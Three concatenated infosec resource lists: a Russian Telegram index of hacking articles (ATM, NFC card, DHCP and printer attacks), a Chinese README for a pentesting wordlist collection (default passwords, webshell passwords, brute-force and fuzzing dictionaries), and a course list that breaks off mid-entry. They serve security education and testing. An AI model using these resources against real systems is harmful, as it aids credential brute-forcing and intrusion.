Полиция терялась в догадках: на корпусах банкоматов не было ни следов взлома, ни накладных устройств — скиммеров. Злоумышленники даже не использовали банковские карты. * [Конференция DEFCON 27. Изготовление дубликатов механических ключей с ограниченным доступом.](https://t.me/S_E_Book/538) * [DEFCON 27. Твой автомобиль – мой автомобиль.](https://t.me/S_E_Book/555) - Существует множество производителей, предлагающих дополнительные системы сигнализации, которые обеспечивают эти удобства и душевное спокойствие. Но насколько мы можем доверять поставщикам этих систем, защищающих доступ к нашим автомобилям в цифровом домене? В этом докладе Jmaxxz расскажет о том, что он обнаружил, когда заглянул в одну из таких систем. * [Список конференций по ИБ с 2012 по 2019.](https://t.me/S_E_Book/598) * [Список ПО, Библиотек, документов и других ресурсов по ИБ.](https://t.me/S_E_Book/599) * [Атаки на бесконтактные банковские карты.](https://t.me/S_E_Book/631) * [NFC Copy Cat.](https://t.me/S_E_Book/636) - устройство тестирования платежных систем с магнитной полосой и NFC. Для этого используются инструменты MagSpoof и NFCopy. * [RFID-кошельки и другая полезная информация.](https://t.me/S_E_Book/638) * [HUNTER CAT - CARD SKIMMER DETECTOR.](https://t.me/S_E_Book/639) - Быстро и надежно проверяйте устройства считывания карт - банкоматы, устройства PoS и т. Д. - не рискуя своими реальными данными. Идеально подходит для внутренних аудитов и тестеров на проникновение. * [Proxmark 3.](https://t.me/S_E_Book/641) - Одним из лучших помощников для проведения атак на бесконтактные карты было и остается устройство под названием Proxmark3. Оно доступно в нескольких вариантах. * [Клонирование отпечатков пальцев.](https://t.me/S_E_Book/677) * [Атакуем DHCP.](https://t.me/S_E_Book/818) - Протокол DHCP применяется для автоматического назначения IP-адреса, шлюза по умолчанию, DNS-сервера и т.д. В качестве транспорта данный протокол использует UDP, а это значит, что мы можем без особых проблем подменять все интересующие нас поля в сетевом пакете, начиная с канального уровня: MAC-адрес источника, IP-адрес источника, порты источника — то есть все, что нам хочется. * [Самая киберпанковская конференция по информационной безопасности.](https://t.me/S_E_Book/823) * [FAQ по перехвату сотовой связи: что такое IMSI-перехватчики / СКАТы, и можно ли от них защититься.](https://t.me/S_E_Book/828) * [Список наиболее используемого софта, некоторых хакерских групп из отчета ISTR.](https://t.me/S_E_Book/831) * [Исследование безопасности систем оплаты парковки.](https://t.me/S_E_Book/834) * [Как криптомессенджер Signal успешно противостоит прослушке со стороны властей США.](https://t.me/S_E_Book/843) * [Технические детали взлома банка Capital One на AWS.](https://t.me/S_E_Book/845) * [90+ полезных инструментов для Kubernetes: развертывание, управление, мониторинг, безопасность и не только.](https://t.me/S_E_Book/869) * [Уязвимость в протоколе SS7.](test) * [Тотальная слежка в Москве. Как власти следят за вами через камеры.](https://t.me/S_E_Book/927) * [Коллекция руководств, шпаргалок, блогов, инструментов и многого другого.](https://t.me/S_E_Book/929) * [Google Dorking или используем Гугл на максимум.](https://t.me/S_E_Book/931) * [Telegram наркомафии | Секретный сервис преступников и его взлом.](https://t.me/S_E_Book/978) * [Великая война хакеров 1990 года (Great Hacker War).](https://t.me/S_E_Book/981) * [История одного взлома или учитесь на чужих ошибках.](https://t.me/S_E_Book/988) * [Сколько стоит взломать почту: небольшой анализ рынка хакеров по найму.](https://t.me/S_E_Book/989) * [Useful PuTTY Configuration Tips and Tricks.](https://t.me/S_E_Book/1015) * [Автоматический поиск общедоступных веб-камер в Интернете.](https://t.me/S_E_Book/1065) * [Тайны файла подкачки pagefile.sys: полезные артефакты для компьютерного криминалиста.](https://t.me/S_E_Book/1076) - pagefile.sys — это файл подкачки операционной системы Windows. При нехватке оперативной памяти Windows резервирует определенное место на жестком диске и использует его для увеличения своих возможностей. Иными словами, выгружает часть данных из оперативной памяти в файл pagefile.sys. Очень часто необходимые для исследователя сведения остаются только в файле подкачки. * [RedTeam Gadgets.](https://t.me/S_E_Book/1081) * [Список руководств, инструментов и других ресурсов, связанных с безопасностью и взломом замков, сейфов и ключей.](https://t.me/S_E_Book/1104) * [Awesome IoT Hacks.](https://t.me/S_E_Book/1108) * [Анализ фишинговой атаки на клиентов HalykBank (RU).](https://t.me/S_E_Book/1152) * [WiFi Арсенал.](https://t.me/S_E_Book/1154) - Очень много полезного софта на все случаи жизни. * [Sn1per.](https://t.me/S_E_Book/1157) - Автоматизированный инструмент разведки и сканирования на проникновение. Программа может быть использована во время теста на проникновение для перечисления и сканирования уязвимостей. * [Взлом принтеров.](https://t.me/S_E_Book/1162) - Взломать 50 000 сетевых принтеров и распечатать произвольный текст? Нет ничего прощеǃ * [Полезные трюки при работе с netcat.](https://t.me/S_E_Book/1163) - В данной статье я рассмотрю популярную сетевую утилиту netcat и полезные трюки при работе с ней. * [Awesome DevSecOps](https://t.me/S_E_Book/1176) - Подборка ресурсов по DevSecOps и AppSec. Инструменты, конференции, доклады, подкасты, фреймворки и многое другое...
# Dictionary-Of-Pentesting ## 简介 收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。 收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。 涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。 该项目计划持续收集。 ## 更新记录 **2022.05.08** 1. 增加 keys/secret 正则表达式 2. 增加Dom XSS sink **2021.12.14** 1. 增加EyeWitness的识别规则 **2021.10.04** 1. 增加Burp的Software Version Checks的识别规则 2. 增加Client-Side Prototype Pollution的规则(基于Burp的Software Version Checks插件) **2021.09.22** 1. 增加MQTT 爆破用的用户名和密码。 **2021.08.01** 1. 增加100余条CND列表 2. 系统命令执行Fuzzing payload **2021.07.30** 1. 增加19个cdn服务列表。 感谢@leveryd 提供 **2021.07.26** 1. 增加一个子域名爆破字典 **2021.06.23** 1. 一些开源Web应用的ViewState默认key。 2. upload 一些上传文件的参数名 **2021.06.18** 1. 增加Bug-Bounty-Wordlists **2021.06.06** 1. 增加SuperWordlist的用户名和密码字典。包括Tomcat、PMA、DEV等密码字典,还有CN、EN邮箱用户名、TOP20管理用户名。 2. 200万子域名字典 **2021.06.02** 1. 增加43个云waf或cdn列表 **2021.05.28** 1. 增加wappalyzer的指纹规则 **2021.04.28** 1. XXE payloads for specific DTDs **2021.04.26** 1. 增加云厂商的metadata有用的一些地址。(包含AWS、Google Cloud、Digital Ocean 、Packetcloud、Azure、Oracle Cloud 、Alibaba、OpenStack/RackSpace 、Oracle Cloud、Kubernetes) **2021.02.19** 1. 增加aem路径列表 **2021.02.07** 1. 增加top25 漏洞参数(SQLI/XSS/RCE/OPENREDIRECT/LFI/SSRF) **2021.02.04** 1. 增加all.txt 字典。 **2021.02.03** 1. 增加amass的子域名字典。 **2021.01.31** 1. 增加AllAboutBugBounty项目的文档 **2021.01.27** 1. 增加几个可能导致RCE的端口 **2021.01.24** 1. 增加两个github dork **2021.01.16** 1. 增加cve的一些路径 2. 一些已知错误配置的路径 3. 一些API端点或服务器信息的特殊路径 4. 以上3种的合集(去重后) **2021.01.13** 1. 增加callback参数字典 2. 增加常见报错信息字符串列表 3. 增加debug参数字典 4. 增加snmp密码字典 5. 增加weblogic常见用户名密码 6. 增加oracle用户名、密码字典 **2021.01.04** 1. 增加DefaultCreds-cheat-sheet **2021.01.03** 1. 增加crackstation下载地址(由于字典太大,给出下载链接)。 2. 增加rockyou字典。 3. 增加cain字典。 **2021.01.02** 1. 增加webshell密码字典 2. 增加7w和81万请求参数字典 3. 增加Lcoalhost地址字典 4. HTML标签列表 **2020.12.31** 1. 增加域账户弱密码字典(7000+) **2020.12.30** 1. 增加ntlm验证的路径 **2020.12.15** 1. 增加github dork的搜索脚本。 **2020.12.09** 1. 增加CEH web services的用户名和密码字典。 **2020.12.07** 1. 增加oracle路径列表 **2020.11.23** 1. 增加ctf字典。 2. 增加摄像rtsp默认路径和默认用户名和密码 **2020.11.14** 1. 增加1个ics 默认密码字典 2. 增加1个设备默认密码字典(3400余条) **2020.11.04** 1. 增加 Wordpress BruteForc List **2020.11.03** 1. 增加几个默认口令 **2020.10.15** 1. 增加一些payload **2020.09.30** 1. 增加常见可以RCE的端口 **2020.09.29** 1. bugbounty oneliner rce 2. 一些默认路径 3. top 100k 密码字典 4. top 5k 用户名字典 5. 一些代码审计正则表达式 **2020.09.27** 1. 增加cms识别指纹规则集,包含 fofa/Wappalyzer/WEBEYE/web中间件/开发语言 等众多指纹库内容 **2020.09.22** 1. 修改swagger字典,添加5条路径 **2020.09.21** 1. 增加3种类型密码字典,拼音、纯数字、键盘密码字典 2. 增加scada 默认密码,硬编码等列表 **2020.09.18** 1. 增加11k+用户名密码组合 **2020.09.17** 1. 增加action后缀 top 100 2. javascript 中on事件列表 3. URL 16进制fuzz **2020.09.15** 1. 增加XXE bruteforce wordlist 2. 增加sql备份文件名字典 3. 删除重复的spring boot内容 **2020.09.10** 1. 增加自己收集的webservices内容。包含webservices目录,文件名,拓展名。后续计划增加存在漏洞webservices路径内容 2. readme中增加更新历史 **2020.09.09** 1. 增加weblogic路径 2. 增加swagger路径 3. 增加graphql路径 4. 增加spring-boot路径 5. 去掉device/default_password_list.txt文件中的空行 **2020.09.08** 1. 更新jsFileDict.txt字典,增加4个js文件名 **2020.09.07** 1. 添加绕过ip限制的http请求投 2. 修改readme.md **2020.08.29** 1. 增加常见设备、安全产品默认口令 2. 增加一行命令的BugBounty tips 3. 增加两处参数字典 4. 增加bruteforce-lists的字典 5. Readme 文件增加来源。逐渐完善。 **2020.08.28** 1. 增加api路径 2. 增加js文件路径 3. 增加http请求参数 4. 增加http请求参数值 **2020.08.27** 1. 删除一些多余文件 2. 精简Files下的dict的层级 3. 增加DirBuster字典 4. 增加spring boot actuator字典 **2020.08.26** 首次提交 ## 来源&致谢 该项目内容均来源于网络或自己整理,感谢各位大佬们的共享精神和辛苦付出~ * [https://github.com/maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/internetwache/CT_subdomains](https://github.com/internetwache/CT_subdomains) * [https://github.com/lijiejie/subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) * [https://github.com/shmilylty/OneForAll](https://github.com/shmilylty/OneForAll) * [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/OfJAAH/KingOfBugBountyTips](https://github.com/OfJAAH/KingOfBugBountyTips) * [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) * [https://github.com/TheKingOfDuck/fuzzDicts](https://github.com/TheKingOfDuck/fuzzDicts) * [https://github.com/NS-Sp4ce/Dict](https://github.com/NS-Sp4ce/Dict) * [https://github.com/s0md3v/Arjun](https://github.com/s0md3v/Arjun) * [https://github.com/fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb) * [https://github.com/YasserGersy/Enums/](https://github.com/YasserGersy/Enums/) * [https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf](https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf) * [https://twitter.com/DanielAzulay18/status/1304751830539395072](https://twitter.com/DanielAzulay18/status/1304751830539395072) * [https://github.com/cwkiller/Pentest_Dic](https://github.com/cwkiller/Pentest_Dic) * [https://github.com/huyuanzhi2/password_brute_dictionary](https://github.com/huyuanzhi2/password_brute_dictionary) * [https://github.com/Clear2020/icsmaster/](https://github.com/Clear2020/icsmaster/) * [https://github.com/LandGrey/SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit) * [https://github.com/al0ne/Vxscan][https://github.com/al0ne/Vxscan] * [https://github.com/L0kiii/FofaScan](https://github.com/L0kiii/FofaScan) * [https://github.com/nw01f/CmsIdentification-masterV2](https://github.com/nw01f/CmsIdentification-masterV2) * [https://github.com/Lucifer1993/cmsprint](https://github.com/Lucifer1993/cmsprint) * [https://github.com/erwanlr/Fingerprinter](https://github.com/erwanlr/Fingerprinter) * [https://github.com/lewiswu1209/fingerprint](https://github.com/lewiswu1209/fingerprint) * [https://github.com/shelld3v/RCE-python-oneliner-payload](https://github.com/shelld3v/RCE-python-oneliner-payload) * [https://twitter.com/ptswarm/status/1311310897592315905](https://twitter.com/ptswarm/status/1311310897592315905) * [https://github.com/xer0days/BugBounty](https://github.com/xer0days/BugBounty) * [https://twitter.com/ptswarm/status/1323266632920256512](https://twitter.com/ptswarm/status/1323266632920256512) * [https://github.com/kongsec/Wordpress-BruteForce-List/](https://github.com/kongsec/Wordpress-BruteForce-List/) * [https://github.com/nyxxxie/awesome-default-passwords](https://github.com/nyxxxie/awesome-default-passwords) * [https://github.com/arnaudsoullie/ics-default-passwords](https://github.com/arnaudsoullie/ics-default-passwords) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) * [https://github.com/pwnfoo/NTLMRecon](https://github.com/pwnfoo/NTLMRecon) * [https://github.com/chroblert/domainWeakPasswdCheck](https://github.com/chroblert/domainWeakPasswdCheck/) * [https://github.com/gh0stkey/Web-Fuzzing-Box](https://github.com/gh0stkey/Web-Fuzzing-Box) * [https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) * [https://github.com/ihebski/DefaultCreds-cheat-sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet) * [https://github.com/epony4c/Exploit-Dictionary](https://github.com/epony4c/Exploit-Dictionary) * [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths) * [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) * [https://github.com/daffainfo/AllAboutBugBounty](https://github.com/daffainfo/AllAboutBugBounty) * [https://github.com/OWASP/Amass](https://github.com/OWASP/Amass) * [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) * [https://github.com/lutfumertceylan/top25-parameter](https://github.com/lutfumertceylan/top25-parameter) * [https://github.com/clarkvoss/AEM-List](https://github.com/clarkvoss/AEM-List) * [https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb](https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb) * [https://raw.githubusercontent.com/GoSecure/dtd-finder/master/list/xxe_payloads.md](https://raw.githubusercontent.com/GoSecure/dtd-finder/master/list/xxe_payloads.md) * [https://raw.githubusercontent.com/AliasIO/wappalyzer/master/src/technologies.json](https://raw.githubusercontent.com/AliasIO/wappalyzer/master/src/technologies.json) * [https://github.com/fuzz-security/SuperWordlist](https://github.com/fuzz-security/SuperWordlist) * [https://wordlists.assetnote.io/](https://wordlists.assetnote.io/) * [https://github.com/Karanxa/Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists) * [https://github.com/yuanhaiGreg/Fuzz-Dict](https://github.com/yuanhaiGreg/Fuzz-Dict) * [https://github.com/MistSpark/DNS-Wordlists](https://github.com/MistSpark/DNS-Wordlists) * [https://github.com/0x727/ShuiZe_0x727/blob/master/Plugins/infoGather/subdomain/CDN/cdn-domain.conf](https://github.com/0x727/ShuiZe_0x727/blob/master/Plugins/infoGather/subdomain/CDN/cdn-domain.conf) * [https://github.com/omurugur/OS_Command_Payload_List](https://github.com/omurugur/OS_Command_Payload_List) * [https://github.com/akamai-threat-research/mqtt-pwn](https://github.com/akamai-threat-research/mqtt-pwn) * [https://github.com/BlackFan/cspp-tools](https://github.com/BlackFan/cspp-tools) * [https://github.com/augustd/burp-suite-software-version-checks](https://github.com/augustd/burp-suite-software-version-checks) * [https://github.com/FortyNorthSecurity/EyeWitness/](https://github.com/FortyNorthSecurity/EyeWitness/) * [https://gist.github.com/h4x0r-dz/be69c7533075ab0d3f0c9b97f7c93a59](https://gist.github.com/h4x0r-dz/be69c7533075ab0d3f0c9b97f7c93a59)
Awesome Infosec =============== [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) A curated list of awesome information security resources, inspired by the awesome-* trend on GitHub. Those resources and tools are intended only for cybersecurity professional and educational use in a controlled environment. Table of Contents ================= 1. [Massive Online Open Courses](#massive-online-open-courses) 2. [Academic Courses](#academic-courses) 3. [Laboratories](#laboratories) 4. [Capture the Flag](#capture-the-flag) 5. [Open Security Books](#open-security-books) 6. [Challenges](#challenges) 7. [Documentation](#documentation) 8. [SecurityTube Playlists](#securitytube-playlists) 9. [Related Awesome Lists](#related-awesome-lists) 10. [Contributing](#contributing) 11. [License](#license) Massive Online Open Courses =========================== #### Stanford University - Computer Security In this class you will learn how to design secure systems and write secure code. You will learn how to find vulnerabilities in code and how to design software systems that limit the impact of security vulnerabilities. We will focus on principles for building secure systems and give many real world examples. - [Stanford University - Computer Security](https://www.coursera.org/learn/security) #### Stanford University - Cryptography I This course explains the inner workings of cryptographic primitives and how to correctly use them. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with a detailed discussion of how two parties who have a shared secret key can communicate securely when a powerful adversary eavesdrops and tampers with traffic. We will examine many deployed protocols and analyze mistakes in existing systems. The second half of the course discusses public-key techniques that let two or more parties generate a shared secret key. We will cover the relevant number theory and discuss public-key encryption and basic key-exchange. Throughout the course students will be exposed to many exciting open problems in the field. - [Stanford University - Cryptography I](https://www.coursera.org/learn/crypto) #### Stanford University - Cryptography II This course is a continuation of Crypto I and explains the inner workings of public-key systems and cryptographic protocols. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with constructions for digital signatures and their applications. We will then discuss protocols for user authentication and zero-knowledge protocols. Next we will turn to privacy applications of cryptography supporting anonymous credentials and private database lookup. We will conclude with more advanced topics including multi-party computation and elliptic curve cryptography. - [Stanford University - Cryptography II](https://www.coursera.org/learn/crypto2) #### University of Maryland - Usable Security This course focuses on how to design and build secure systems with a human-centric focus. We will look at basic principles of human-computer interaction, and apply these insights to the design of secure systems with the goal of developing security measures that respect human performance and their goals within a system. - [University of Maryland - Usable Security](https://www.coursera.org/learn/usablesec) #### University of Maryland - Software Security This course we will explore the foundations of software security. We will consider important software vulnerabilities and attacks that exploit them -- such as buffer overflows, SQL injection, and session hijacking -- and we will consider defenses that prevent or mitigate these attacks, including advanced testing and program analysis techniques. Importantly, we take a "build security in" mentality, considering techniques at each phase of the development cycle that can be used to strengthen the security of software systems. - [University of Maryland - Software Security](https://www.coursera.org/learn/softwaresec) #### University of Maryland - Cryptography This course will introduce you to the foundations of modern cryptography, with an eye toward practical applications. We will learn the importance of carefully defining security; of relying on a set of well-studied "hardness assumptions" (e.g., the hardness of factoring large numbers); and of the possibility of proving security of complicated constructions based on low-level primitives. We will not only cover these ideas in theory, but will also explore their real-world impact. You will learn about cryptographic primitives in wide use today, and see how these can be combined to develop modern protocols for secure communication. - [University of Maryland - Cryptography](https://www.coursera.org/learn/cryptography) #### University of Maryland - Hardware Security This course will introduce you to the foundations of modern cryptography, with an eye toward practical applications. We will learn the importance of carefully defining security; of relying on a set of well-studied “hardness assumptions” (e.g., the hardness of factoring large numbers); and of the possibility of proving security of complicated constructions based on low-level primitives. We will not only cover these ideas in theory, but will also explore their real-world impact. You will learn about cryptographic primitives in wide use today, and see how these can be combined to develop modern protocols for secure communication. - [University of Maryland - Hardware Security](https://www.coursera.org/learn/hardwaresec) Academic Courses ================ #### NYU Tandon School of Engineering - OSIRIS Lab's Hack Night Developed from the materials of NYU Tandon's old Penetration Testing and Vulnerability Analysis course, Hack Night is a sobering introduction to offensive security. A lot of complex technical content is covered very quickly as students are introduced to a wide variety of complex and immersive topics over thirteen weeks. - [NYU Tandon's OSIRIS Lab's Hack Night](https://github.com/isislab/Hack-Night) #### Florida State University's - Offensive Computer Security The primary incentive for an attacker to exploit a vulnerability, or series of vulnerabilities is to achieve a return on an investment (his/her time usually). This return need not be strictly monetary, an attacker may be interested in obtaining access to data, identities, or some other commodity that is valuable to them. The field of penetration testing involves authorized auditing and exploitation of systems to assess actual system security in order to protect against attackers. This requires thorough knowledge of vulnerabilities and how to exploit them. Thus, this course provides an introductory but comprehensive coverage of the fundamental methodologies, skills, legal issues, and tools used in white hat penetration testing and secure system administration. * [Offensive Computer Security - Spring 2014](http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity) * [Offensive Computer Security - Spring 2013](http://www.cs.fsu.edu/~redwood/OffensiveSecurity) #### Florida State University's - Offensive Network Security This class allows students to look deep into know protocols (i.e. IP, TCP, UDP) to see how an attacker can utilize these protocols to their advantage and how to spot issues in a network via captured network traffic. The first half of this course focuses on know protocols while the second half of the class focuses on reverse engineering unknown protocols. This class will utilize captured traffic to allow students to reverse the protocol by using known techniques such as incorporating bioinformatics introduced by Marshall Beddoe. This class will also cover fuzzing protocols to see if the server or client have vulnerabilities. Overall, a student finishing this class will have a better understanding of the network layers, protocols, and network communication and their interaction in computer networks. * [Offensive Network Security](http://www.cs.fsu.edu/~lawrence/OffNetSec/) #### Rensselaer Polytechnic Institute - Malware Analysis This course will introduce students to modern malware analysis techniques through readings and hands-on interactive analysis of real-world samples. After taking this course students will be equipped with the skills to analyze advanced contemporary malware using both static and dynamic analysis. - [CSCI 4976 - Fall '15 Malware Analysis](https://github.com/RPISEC/Malware) #### Rensselaer Polytechnic Institute - Modern Binary Exploitation This course will start off by covering basic x86 reverse engineering, vulnerability analysis, and classical forms of Linux-based userland binary exploitation. It will then transition into protections found on modern systems (Canaries, DEP, ASLR, RELRO, Fortify Source, etc) and the techniques used to defeat them. Time permitting, the course will also cover other subjects in exploitation including kernel-land and Windows based exploitation. * [CSCI 4968 - Spring '15 Modern Binary Exploitation](https://github.com/RPISEC/MBE) #### Rensselaer Polytechnic Institute - Hardware Reverse Engineering Reverse engineering techniques for semiconductor devices and their applications to competitive analysis, IP litigation, security testing, supply chain verification, and failure analysis. IC packaging technologies and sample preparation techniques for die recovery and live analysis. Deprocessing and staining methods for revealing features bellow top passivation. Memory technologies and appropriate extraction techniques for each. Study contemporary anti-tamper/anti-RE methods and their effectiveness at protecting designs from attackers. Programmable logic microarchitecture and the issues involved with reverse engineering programmable logic. - [CSCI 4974/6974 - Spring '14 Hardware Reverse Engineering](http://security.cs.rpi.edu/courses/hwre-spring2014/) #### City College of San Francisco - Sam Bowne Class - [CNIT 40: DNS Security ](https://samsclass.info/40/40_F16.shtml)<br> DNS is crucial for all Internet transactions, but it is subject to numerous security risks, including phishing, hijacking, packet amplification, spoofing, snooping, poisoning, and more. Learn how to configure secure DNS servers, and to detect malicious activity with DNS monitoring. We will also cover DNSSEC principles and deployment. Students will perform hands-on projects deploying secure DNS servers on both Windows and Linux platforms. - [CNIT 120 - Network Security](https://samsclass.info/120/120_S15.shtml)<br> Knowledge and skills required for Network Administrators and Information Technology professionals to be aware of security vulnerabilities, to implement security measures, to analyze an existing network environment in consideration of known security threats or risks, to defend against attacks or viruses, and to ensure data privacy and integrity. Terminology and procedures for implementation and configuration of security, including access control, authorization, encryption, packet filters, firewalls, and Virtual Private Networks (VPNs). - [CNIT 121 - Computer Forensics](https://samsclass.info/121/121_F16.shtml)<br> The class covers forensics tools, methods, and procedures used for investigation of computers, techniques of data recovery and evidence collection, protection of evidence, expert witness skills, and computer crime investigation techniques. Includes analysis of various file systems and specialized diagnostic software used to retrieve data. Prepares for part of the industry standard certification exam, Security+, and also maps to the Computer Investigation Specialists exam. - [CNIT 123 - Ethical Hacking and Network Defense](https://samsclass.info/123/123_S17.shtml)<br> Students learn how hackers attack computers and networks, and how to protect systems from such attacks, using both Windows and Linux systems. Students will learn legal restrictions and ethical guidelines, and will be required to obey them. Students will perform many hands-on labs, both attacking and defending, using port scans, footprinting, exploiting Windows and Linux vulnerabilities, buffer overflow exploits, SQL injection, privilege escalation, Trojans, and backdoors. - [CNIT 124 - Advanced Ethical Hacking](https://samsclass.info/124/124_F15.shtml)<br> Advanced techniques of defeating computer security, and countermeasures to protect Windows and Unix/Linux systems. Hands-on labs include Google hacking, automated footprinting, sophisticated ping and port scans, privilege escalation, attacks against telephone and Voice over Internet Protocol (VoIP) systems, routers, firewalls, wireless devices, Web servers, and Denial of Service attacks. - [CNIT 126 - Practical Malware Analysis](https://samsclass.info/126/126_S16.shtml)<br> Learn how to analyze malware, including computer viruses, trojans, and rootkits, using disassemblers, debuggers, static and dynamic analysis, using IDA Pro, OllyDbg and other tools. - [CNIT 127 - Exploit Development](https://samsclass.info/127/127_S17.shtml)<br> Learn how to find vulnerabilities and exploit them to gain control of target systems, including Linux, Windows, Mac, and Cisco. This class covers how to write tools, not just how to use them; essential skills for advanced penetration testers and software security professionals. - [CNIT 128 - Hacking Mobile Devices](https://samsclass.info/128/128_S17.shtml)<br> Mobile devices such as smartphones and tablets are now used for making purchases, emails, social networking, and many other risky activities. These devices run specialized operating systems have many security problems. This class will cover how mobile operating systems and apps work, how to find and exploit vulnerabilities in them, and how to defend them. Topics will include phone call, voicemail, and SMS intrusion, jailbreaking, rooting, NFC attacks, malware, browser exploitation, and application vulnerabilities. Hands-on projects will include as many of these activities as are practical and legal. - [CNIT 129S: Securing Web Applications](https://samsclass.info/129S/129S_F16.shtml)<br> Techniques used by attackers to breach Web applications, and how to protect them. How to secure authentication, access, databases, and back-end components. How to protect users from each other. How to find common vulnerabilities in compiled code and source code. - [CNIT 140: IT Security Practices](https://samsclass.info/140/140_F16.shtml)<br> Training students for cybersecurity competitions, including CTF events and the [Collegiate Cyberdefense Competition (CCDC)](http://www.nationalccdc.org/). This training will prepare students for employment as security professionals, and if our team does well in the competitions, the competitors will gain recognition and respect which should lead to more and better job offers. - [Violent Python and Exploit Development](https://samsclass.info/127/127_WWC_2014.shtml)<br> In the exploit development section, students will take over vulnerable systems with simple Python scripts. ## Open Security Training OpenSecurityTraining.info is dedicated to sharing training material for computer security classes, on any topic, that are at least one day long. #### Beginner Classes - [Android Forensics & Security Testing](http://opensecuritytraining.info/AndroidForensics.html)<br> This class serves as a foundation for mobile digital forensics, forensics of Android operating systems, and penetration testing of Android applications. - [Certified Information Systems Security Professional (CISSP)® <br>Common Body of Knowledge (CBK)® Review](http://opensecuritytraining.info/CISSP-Main.html)<br> The CISSP CBK Review course is uniquely designed for federal agency information assurance (IA) professionals in meeting [NSTISSI-4011](http://www.cnss.gov/Assets/pdf/nstissi_4011.pdf), National Training Standard for Information Systems Security Professionals, as required by [DoD 8570.01-M](http://www.dtic.mil/whs/directives/corres/pdf/857001m.pdf), Information Assurance Workforce Improvement Program. - [Flow Analysis & Network Hunting](http://opensecuritytraining.info/Flow.html)<br> This course focuses on network analysis and hunting of malicious activity from a security operations center perspective. We will dive into the netflow strengths, operational limitations of netflow, recommended sensor placement, netflow tools, visualization of network data, analytic trade craft for network situational awareness and networking hunting scenarios. - [Hacking Techniques and Intrusion Detection](http://opensecuritytraining.info/HTID.html)<br> The course is designed to help students gain a detailed insight into the practical and theoretical aspects of advanced topics in hacking techniques and intrusion detection. - [Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntroX86.html)<br> This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations. - [Introductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntroX86-64.html)<br> This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations. - [Introduction to ARM](http://opensecuritytraining.info/IntroARM.html)<br> This class builds on the Intro to x86 class and tries to provide parallels and differences between the two processor architectures wherever possible while focusing on the ARM instruction set, some of the ARM processor features, and how software works and runs on the ARM processor. - [Introduction to Cellular Security](http://opensecuritytraining.info/IntroCellSec.html)<br> This course is intended to demonstrate the core concepts of cellular network security. Although the course discusses GSM, UMTS, and LTE - it is heavily focused on LTE. The course first introduces important cellular concepts and then follows the evolution of GSM to LTE. - [Introduction to Network Forensics](http://opensecuritytraining.info/NetworkForensics.html)<br> This is a mainly lecture based class giving an introduction to common network monitoring and forensic techniques. - [Introduction to Secure Coding](http://opensecuritytraining.info/IntroSecureCoding.html)<br> This course provides a look at some of the most prevalent security related coding mistakes made in industry today. Each type of issue is explained in depth including how a malicious user may attack the code, and strategies for avoiding the issues are then reviewed. - [Introduction to Vulnerability Assessment](http://opensecuritytraining.info/IntroductionToVulnerabilityAssessment.html)<br> This is a lecture and lab based class giving an introduction to vulnerability assessment of some common common computing technologies. Instructor-led lab exercises are used to demonstrate specific tools and technologies. - [Introduction to Trusted Computing](http://opensecuritytraining.info/IntroToTrustedComputing.html)<br> This course is an introduction to the fundamental technologies behind Trusted Computing. You will learn what Trusted Platform Modules (TPMs) are and what capabilities they can provide both at an in-depth technical level and in an enterprise context. You will also learn about how other technologies such as the Dynamic Root of Trust for Measurement (DRTM) and virtualization can both take advantage of TPMs and be used to enhance the TPM's capabilities. - [Offensive, Defensive, and Forensic Techniques for Determining Web User Identity](http://opensecuritytraining.info/WebIdentity.html)<br> This course looks at web users from a few different perspectives. First, we look at identifying techniques to determine web user identities from a server perspective. Second, we will look at obfuscating techniques from a user whom seeks to be anonymous. Finally, we look at forensic techniques, which, when given a hard drive or similar media, we identify users who accessed that server. - [Pcap Analysis & Network Hunting](http://opensecuritytraining.info/Pcap.html)<br> Introduction to Packet Capture (PCAP) explains the fundamentals of how, where, and why to capture network traffic and what to do with it. This class covers open-source tools like 